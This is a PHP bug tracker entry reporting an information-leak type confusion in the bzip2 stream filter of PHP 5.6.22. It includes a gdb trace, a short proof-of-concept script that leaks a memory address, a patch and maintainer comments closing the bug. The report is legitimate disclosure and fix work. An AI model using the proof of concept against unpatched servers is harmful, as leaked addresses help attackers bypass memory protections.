php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72447 Type Confusion in php_bz2_filter_create()
Submitted: 2016-06-18 17:16 UTC Modified: 2016-06-19 05:05 UTC
From: gogil at stealien dot com Assigned: sterling
Status: Closed Package: Bzip2 Related
PHP Version: 5.6.22 OS: *
Private report: No CVE-ID:
 [2016-06-18 17:16 UTC] gogil at stealien dot com
Description:
------------
Type Confusion vulnerability in php_bz2_filter_create() which leaking information.


/php$ gdb --args php-5.6.22/sapi/cli/php poc.php
Reading symbols from php-5.6.22/sapi/cli/php...done.
(gdb) b bz2_filter.c:391
Breakpoint 1 at 0x5d49e1: file /php/php-5.6.22/ext/bz2/bz2_filter.c, line 391.
(gdb) r
Starting program: /php/php-5.6.22/sapi/cli/php poc.php

Breakpoint 1, php_bz2_filter_create (
    filtername=0x7ffff7eae8c0 "bzip2.compress", filterparams=0x7ffff7fc11c0, 
    persistent=0) at /php/php-5.6.22/ext/bz2/bz2_filter.c:391
391		if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) {
(gdb) n
395			tmp = **tmpzval;
(gdb) n
396			zval_copy_ctor(&tmp);
(gdb) n
397			convert_to_long(&tmp);
(gdb) n
398			if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) {
(gdb) n
399				php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval));
<---------- Z_LVAL_PP macro is able to leaking memory address.

(gdb) n

Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896) in /php/poc.php on line 6

(gdb) x/x 140737352754896
0x7ffff7eae6d0:	0x41414141




* Fix
File ext/bz2/bz2_filter.c, line 391:
	if (zend_hash_find(HASH_OF(filterparams), "blocks", sizeof("blocks"), (void**) &tmpzval) == SUCCESS) {
		/* How much memory to allocate (1 - 9) x 100kb */
		zval tmp;
	
		tmp = **tmpzval;
		zval_copy_ctor(&tmp);
		convert_to_long(&tmp);
		if (Z_LVAL(tmp) < 1 || Z_LVAL(tmp) > 9) {
-			php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval));
+			php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmp));
		} else {
			blockSize100k = Z_LVAL(tmp);
		}
	}



Test script:
---------------
<?php
// poc.php
$input = "AAAAAAAA";
$param = array('blocks' => $input);

$fp = fopen('testfile', 'w');
stream_filter_append($fp, 'bzip2.compress', STREAM_FILTER_WRITE, $param);
fclose($fp);
?>


Expected result:
----------------
Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (0)

Actual result:
--------------
Warning: stream_filter_append(): Invalid parameter given for number of blocks to allocate. (140737352754896)

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-18 17:37 UTC] gogil at stealien dot com
* Fix
-	php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL_PP(tmpzval));
+	php_error_docref(NULL TSRMLS_CC, E_WARNING, "Invalid parameter given for number of blocks to allocate. (%ld)", Z_LVAL(tmp));

Little mistake.
 [2016-06-19 05:05 UTC] stas@php.net
-Type: Security +Type: Bug -Assigned To: +Assigned To: sterling
 [2016-06-19 05:05 UTC] stas@php.net
Doesn't look like security issue, since it requires special code to reproduce.
 [2016-06-19 05:13 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=42b2d7fec54ec7ea0bc352c502674d6192c8a6fa
Log: Fix bug #72447: Type Confusion in php_bz2_filter_create()
 [2016-06-19 05:13 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-22 05:58 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=42b2d7fec54ec7ea0bc352c502674d6192c8a6fa
Log: Fix bug #72447: Type Confusion in php_bz2_filter_create()
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Feb 21 16:01:43 2017 UTC